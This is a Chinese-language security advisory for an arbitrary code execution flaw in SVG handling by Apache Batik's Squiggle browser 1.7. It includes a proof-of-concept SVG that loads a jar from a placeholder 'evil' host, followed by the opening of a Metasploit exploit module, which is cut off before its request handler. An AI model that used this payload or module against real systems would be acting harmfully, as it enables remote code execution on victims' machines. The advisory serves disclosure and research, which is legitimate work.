Scalable Vector Graphics (SVG)任意代码执行漏洞

发布日期：2012-05-15
更新日期：2012-05-22

受影响系统：
W3C SVG Scalable Vector Graphics (SVG) Tiny 1.2
W3C SVG Scalable Vector Graphics (SVG)  1.2
Apache Group Batik SVG Toolkit 1.7
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 53552

可缩放矢量图形（Scalable Vector Graphics，SVG）是基于可扩展标记语言（XML），用于描述二维矢量图形的一种图形格式。SVG由W3C制定，是一个开放标准。

SVG 1.1和SVG Tiny 1.2规范在实现上存在任意代码执行漏洞，攻击者可利用此漏洞执行任意代码和非法操作。

<*来源：Christian Johansson  
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Christian Johansson （）提供了如下测试方法：

<svg xmlns="http://www.w3.org/2000/svg"
        xmlns:xlink="http://www.w3.org/1999/xlink"
        version="1.0">
<script type="application/java-archive" xlink:href="http://www.example.com/evil.jar"/>
<text>Static text ...</text>
</svg>

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#  
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info={})
        super(update_info(info,
            'Name'           => "Squiggle 1.7 SVG Browser Java Code Execution",
            'Description'    => %q{
                    This module abuses the SVG support to execute Java Code in the
                Squiggle Browser included in the Batik framework 1.7 through a
                crafted svg file referencing a jar file.

In order to gain arbitrary code execution, the browser must meet
                the following conditions: (1) It must support at least SVG version
                1.1 or newer, (2) It must support Java code and (3) The "Enforce
                secure scripting" check must be disabled.

The module has been tested against Windows and Linux platforms.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Nicolas Gregoire', # aka @Agarri_FR, Abuse discovery and PoC
                    'sinn3r',           # Metasploit
                    'juan vazquez'      # Metasploit
                ],
            'References'     =>
                [
                    ['URL', 'http://www.agarri.fr/blog/']
                ],
            'Payload'       =>
                {
                    'Space' => 20480,
                    'BadChars' => '',
                    'DisableNops' => true
                },
            'DefaultOptions'  =>
                {
                    'ExitFunction' => "none"
                },
            'Platform'       => ['win', 'linux', 'java'],
            'Targets'        =>
                [
                    [ 'Generic (Java Payload)',
                        {
                            'Arch' => ARCH_JAVA,
                        }
                    ],
                    [ 'Windows Universal',
                        {
                            'Arch' => ARCH_X86,
                            'Platform' => 'win'
                        }
                    ],
                    [ 'Linux x86',
                        {
                            'Arch' => ARCH_X86,
                            'Platform' => 'linux'
                        }
                    ]
                ],
            'Privileged'     => false,
            'DisclosureDate' => "May 11 2012",
            'DefaultTarget'  => 0))

end

def on_request_uri(cli, request)